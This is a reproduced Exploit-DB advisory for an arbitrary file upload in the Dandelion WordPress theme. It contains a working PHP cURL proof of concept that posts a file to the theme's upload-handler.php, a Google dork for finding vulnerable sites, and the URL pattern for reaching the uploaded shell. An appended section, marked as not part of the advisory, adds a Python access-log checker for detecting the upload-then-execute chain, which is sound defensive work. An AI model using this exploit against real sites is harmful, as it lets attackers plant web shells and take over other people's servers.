WordPress Theme Dandelion – Arbitrary File Upload

  • Author: TheBlackMonster
    Date: 2014-02-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/31424/
# Exploit Title: WordPress Dandelion Themes Arbitrary File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
# Greetz : PhantomGhost, Deto Beiber, All Moroccan Hackers.

We are Moroccans, we are genius !

```php
<?php
// PoC as published. It uses the pre-PHP 5.6 cURL convention of prefixing a
// POSTFIELDS value with "@" to send the named file as a multipart upload
// (PHP 5.6 changed the CURLOPT_SAFE_UPLOAD default and PHP 7 dropped "@" support).
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
```

File access:

http://127.0.0.1/uploads/[years]/[month]/your_shell.php
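Added defender-side example, not part of the advisory: a Python check over web-server access-log lines that flags the two artefacts the PoC and the "File access" note describe, a POST to the theme's upload-handler.php and a subsequent request for a .php file under an uploads/[year]/[month]/ path. The log lines are constructed samples in combined log format, and the handler path is the one from the PoC.

```python
import re

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Feb/2014:10:12:01 +0000] "POST /wp-content/themes/dandelion/functions/upload-handler.php HTTP/1.1" 200 57 "-" "curl/7.35.0"
203.0.113.5 - - [05/Feb/2014:10:12:03 +0000] "GET /uploads/2014/02/yourfile.php HTTP/1.1" 200 1432 "-" "curl/7.35.0"
198.51.100.7 - - [05/Feb/2014:10:13:10 +0000] "GET /uploads/2014/02/photo.jpg HTTP/1.1" 200 88214 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Feb/2014:10:14:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Endpoint named in the advisory's PoC.
UPLOAD_HANDLER = "/wp-content/themes/dandelion/functions/upload-handler.php"
# Executable-looking file under an uploads/<year>/<month>/ directory.
PHP_IN_UPLOADS_RE = re.compile(r"/uploads/\d{4}/\d{2}/[^/]+\.(?:php\d?|phtml)$", re.IGNORECASE)


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), m.group("ts"), m.group("method"), path, int(m.group("status"))


def find_suspicious(log_text):
    """Return (ip, reason, path) findings; a PHP request under uploads/ from an IP
    that already POSTed to the handler is reported as a likely upload-then-execute chain."""
    findings = []
    posted = set()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _ts, method, path, _status = parsed
        if method == "POST" and path.endswith(UPLOAD_HANDLER):
            posted.add(ip)
            findings.append((ip, "POST to theme upload handler", path))
        elif PHP_IN_UPLOADS_RE.search(path):
            reason = "PHP requested under uploads/"
            if ip in posted:
                reason += " after upload-handler POST from same IP"
            findings.append((ip, reason, path))
    return findings
```

Blocking PHP execution in the uploads directory at the web server and verifying the handler is no longer reachable unauthenticated are the mitigations this check is meant to confirm.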